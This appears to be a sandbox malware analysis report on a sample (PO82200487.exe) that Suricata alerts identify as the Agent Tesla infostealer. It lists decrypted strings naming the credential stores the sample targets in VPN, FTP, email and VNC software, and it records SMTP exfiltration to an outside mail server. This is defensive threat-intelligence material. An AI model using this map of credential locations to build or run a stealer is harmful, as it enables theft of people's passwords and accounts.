                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: NordVpn.exe*
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: user.config
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: //setting[@name='Username']/value
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: //setting[@name='Password']/value
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: NordVPN
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: %ProgramW6432%
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Private Internet Access\data
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Private Internet Access\data
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \account.json
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: .*"username":"(.*?)"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: .*"password":"(.*?)"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: privateinternetaccess.com
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FileZilla
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Server>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Host>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Host>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </Host>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Port>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </Port>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <User>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <User>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </User>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </Pass>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Pass>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </Pass>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: CoreFTP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: User
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Host
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Port
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: hdfzpysvpzimorhk
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: WinSCP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HostName
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UserName
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PublicKeyFile
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PortNumber
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: WinSCP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ABCDEF
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Flash FXP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: port
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: user
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pass
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: quick.dat
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Sites.dat
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FlashFXP\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FTP Navigator
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: No Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: User
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SmartFTP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: APPDATA
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: WS_FTP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: appdata
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HOST
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PWD=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PWD=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FtpCommander
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SystemDrive
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \cftp\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Password=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;User=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Server=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Port=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Port=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Password=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;User=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ;Anonymous=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \FTPGetter\servers.xml
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_ip>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </server_ip>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_port>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </server_port>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_user_name>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </server_user_name>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_user_password>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: <server_user_password>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: </server_user_password>
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FTPGetter
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: The Bat!
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: appdata
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \The Bat!
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Account.CFN
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Becky!
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: DataDir
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Folder.lst
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Mailbox.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Account
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PassWd
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Account
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTPServer
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Account
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: MailAddress
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Becky!
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Outlook
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IMAP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: POP3 Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HTTP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTP Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Windows Mail App
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SchemaId
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pResourceElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pIdentityElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pPackageSid
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: pAuthenticatorElement
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: syncpassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: mailoutgoing
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FoxMail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Executable
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: FoxmailPath
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Storage\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Storage\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Accounts\Account.rec0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Accounts\Account.rec0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Account.stg
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Account.stg
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: POP3Host
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTPHost
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: IncomingServer
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Account
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: MailAddress
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: POP3Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Opera Mail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: opera:
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PocoMail
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: appdata
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Pocomail\accounts.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: POPPass
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTPPass
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SMTP
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: eM Client
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: eM Client\accounts.dat
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: eM Client
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Accounts
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: "Username":"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: "Secret":"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: "ProviderName":"
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: o6806642kbM7c5
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Mailbird
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SenderIdentities
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Accounts
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \Mailbird\Store\Store.db
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Server_Host
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Accounts
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Email
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Username
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: EncryptedPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Mailbird
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: RealVNC 4.x
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: RealVNC 3.x
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: RealVNC 4.x
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: RealVNC 3.x
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\ORL\WinVNC3
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: TightVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: TightVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: PasswordViewOnly
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: TightVNC ControlPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\TightVNC\Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ControlPassword
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: TigerVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\TigerVNC\Server
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Password
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd2
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd2
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd2
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: UltraVNC
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: \UltraVNC\ultravnc.ini
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: passwd2
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: JDownloader 2.0
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: org.jdownloader.settings.AccountSettings.accounts.ejs
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: JDownloader 2.0\cfg
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Paltalk
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
                  Source: 0.2.PO82200487.exe.4339620.1.raw.unpackString decryptor: nickname
                  Source: PO82200487.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: PO82200487.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: global trafficTCP traffic: 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                  Source: global trafficTCP traffic: 192.168.2.9:49721 -> 199.79.62.115:587
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                  Source: PO82200487.exe, 00000004.00000002.2568941236.000000000321A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                  Source: PO82200487.exe, 00000000.00000002.1348848708.0000000002C88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: PO82200487.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/character
                  Source: PO82200487.exeString found in binary or memory: http://www.elderscrolls.com/skyrim/characterT
                  Source: PO82200487.exe, 00000000.00000002.1348848708.000000000293A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.elderscrolls.com/skyrim/player
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C325B90_2_00C325B9
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C313F00_2_00C313F0
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C334300_2_00C33430
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C31B810_2_00C31B81
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C39C0C0_2_00C39C0C
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C39D880_2_00C39D88
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C3A3890_2_00C3A389
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C343880_2_00C34388
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C343780_2_00C34378
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C308710_2_00C30871
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C34FC80_2_00C34FC8
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C34FD80_2_00C34FD8
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C313CF0_2_00C313CF
                  Source: C:\Users\user\Desktop\PO82200487.exeCode function: 0_2_00C334180_2_00C33418
